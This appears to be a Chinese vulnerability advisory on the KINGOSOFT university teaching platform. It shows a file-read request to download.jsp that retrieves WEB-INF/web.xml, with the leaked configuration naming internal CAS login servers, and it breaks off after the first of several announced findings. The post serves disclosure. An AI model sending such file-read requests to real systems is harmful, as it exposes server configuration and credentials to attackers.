KINGOSOFT高校网络教学平台一系列严重问题

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: KINGOSOFT高校网络教学平台一系列严重问题 ### 详细说明: KINGOSOFT高校网络教学平台是青果软件的另一产品,发现有严重的安全隐患。 1.文件读取漏洞 这个系统是J2EE开发,我们来访问(实际测试地址不方便放出,因为是学校) ``` http://test.com/testpath/download.jsp?downfile=WEB-INF/web.xml ``` 得到 ``` <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://java.sun.com/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.5" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"> <!-- <filter> <filter-name>CASFilter</filter-name> <filter-class> edu.yale.its.tp.cas.client.filter.CASFilter </filter-class> <init-param> <param-name> edu.yale.its.tp.cas.client.filter.loginUrl </param-name> <param-value> http://192.168.0.186:8081/cas/login </param-value> </init-param> <init-param> <param-name> edu.yale.its.tp.cas.client.filter.validateUrl </param-name> <param-value> https://192.168.0.186:8081/cas/proxyValidate </param-value> </init-param> <init-param> <param-name>...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息